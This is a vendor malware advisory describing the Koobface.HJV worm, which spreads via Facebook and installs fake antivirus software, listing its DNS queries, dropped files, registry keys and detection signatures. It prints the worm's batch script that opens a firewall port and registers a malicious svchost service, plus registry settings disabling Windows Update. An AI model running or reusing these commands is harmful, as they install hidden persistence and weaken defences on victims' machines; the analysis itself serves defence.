Koobface.HJV – Spreading in the wild (Feb 04, 2011)

The Sonicwall UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

The Worm performs the following DNS queries:

• www.google.com
• facebook.com
• www.facebook.com
• d.static.ak.fbcdn.net
• x-treme-radio.host22.com
• www.ashiww.com
• www.wahdohotel.nl
• kingswoodwright.com
• kbfgb.greyzzsecure9.com
• 3064972.greyzzsecure9.com

The Worm attempts to load various web pages using random page names with the .css extension:

• http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
• http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
• http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
• http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
• http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
• http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
• http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
• http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
• http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
• http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css

The Worm installs the following files on the system:

• C:Documents and Settings{USER}Local SettingsTempfeb.bat
• C:Documents and Settings{USER}Local SettingsTempzpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
• C:Documents and Settings{USER}Local SettingsTempzpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
• C:WINDOWS5456456z
• C:WINDOWSbt7.dat
• C:WINDOWSjjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
• C:WINDOWSsystem32feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
• C:WINDOWSsystem32driversfeb.sys [Detected as GAV: Koobface.FF (Trojan)]

feb.bat contains:

netsh firewall add allowedprogram name="feb" program="C:WINDOWSsystem32svchost.exe" mode=enable
netsh firewall add portopening tcp 8087 feb enable
sc create "ffeb" type= interact type= share start= auto binpath= "C:WINDOWSsystem32svchost.exe -k ffeb"
reg add "hklmsystemcurrentcontrolsetservicesffebparameters" /v servicedll /t reg_expand_sz /d "C:WINDOWSsystem32feb.dll" /f
reg add "hklmsystemcurrentcontrolsetservicesffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
reg add "hklmsoftwaremicrosoftwindows ntcurrentversionsvchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
sc start ffeb

feb.dll contains a list or URL’s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL’s contained feb.dll:

• impri{removed}.gr/.lhinrs/
• hk{removed}.org/.ycguh3/
• roomservi{removed}.com.au/.9mov05w/
• nubs.wo{removed}.co.uk/.7txq/
• lenga{removed}.com/.ck5rg8/
• cayenneo{removed}.com/.fplf/
• www.dead{removed}.co.uk/.qe9v/
• ib{removed}.org.il/.5cei7f9/
• www.kurdist{removed}.com/.x5fyik/
• heali{removed}.co.za/.12vatd/
• forwardmar{removed}.org/.6sta03t/
• numerus-{removed}.fr/.li81/
• fino{removed}.com/.ea2cuwa/
• fe{removed}.co.za/.jts51/
• tarr{removed}.com/.5fu3/
• toppla{removed}.nl/.vfnc/
• www.fishingfo{removed}.com/.5wmm9/

The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:

• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer NoAutoUpdate dword:00000001
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer NoWindowsUpdate dword:00000001
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvcHost ffeb hex(7):66,66,65,62,00,00,
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun dfg49df “c:windowsjjp156.exe”
• HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FEB NextInstance dword:00000001
• HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FEB000 Service “feb”
• HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesfeb ImagePath hex(2):”??C:WINDOWSsystem32driversfeb.sys”

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV landing page:

• http://3064972.greyzzsecure9.com/defender/?914ea0a274=vmzd&8a83854da2d=jjdjtamdvz&5f701=jvottyajzt

When clicking on “Remove all” or “Cancel” it attemps to initiate the download of:

• bitav_2053_ext6.exe [Detected as GAV: TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:

• pack.exe [Detected as GAV: SecurityTool.W (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

• GAV: Koobface.HJV (Worm)
• GAV: Koobface.HJV_2 (Worm)
• GAV: Koobface.HJV_3 (Worm)
• GAV: Koobface.FF (Trojan)
• GAV: Delf.EM (Trojan)
• GAV: TDSS.ABCR (Trojan)
• GAV: SecurityTool.W (Trojan)

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.